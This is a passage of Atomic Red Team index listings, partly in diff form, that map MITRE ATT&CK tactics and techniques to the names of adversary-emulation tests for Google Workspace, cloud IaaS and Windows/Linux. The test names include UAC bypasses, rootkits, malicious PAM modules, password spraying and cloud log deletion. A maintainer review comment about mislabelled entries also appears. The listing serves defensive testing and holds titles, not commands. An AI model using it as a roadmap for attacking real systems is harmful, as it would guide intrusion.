- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.008 Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# exfiltration
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
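Review bot: the entry "T1070.008 Email Collection: Mailbox Manipulation" in the defense-evasion block of the Google Workspace listing has a parent prefix that does not match its ID: T1070.008 is a sub-technique of T1070, which the same block lists a few lines later as "T1070 Indicator Removal on Host", and its ATT&CK name is "Clear Mailbox Data" (Email Collection is T1114). Check the mapping source the generator reads for this ID, since a wrong parent here will put any future test under the wrong technique page. Also worth confirming: the only linked test in this whole listing, "Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]", is a Cloud IAM action rather than a Workspace one, and the `google-workspace` tag is what pulls it into four tactic sections of this index; if the tag was added so the test shows up somewhere for Google, the platform list on that atomic should be trimmed to `iaas:gcp` so the Workspace index does not advertise coverage it does not have.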
@@ -1,157 +0,0 @@
# IaaS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
- Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
- Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
- T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1485 Data Destruction [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:azure]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #11: Examine AWS Password Policy [iaas:aws]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
- Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
# exfiltration
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-2658
@@ -1,2658 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.011 Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 execute VBscript command using Ordinal number [windows]
- Atomic Test #4: Rundll32 advpack.dll Execution [windows]
- Atomic Test #5: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #6: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #7: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #8: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #9: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #10: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #11: Rundll32 with Ordinal Value [windows]
- Atomic Test #12: Rundll32 with Control_RunDLL [windows]
- Atomic Test #13: Rundll32 with desk.cpl [windows]
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
- Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
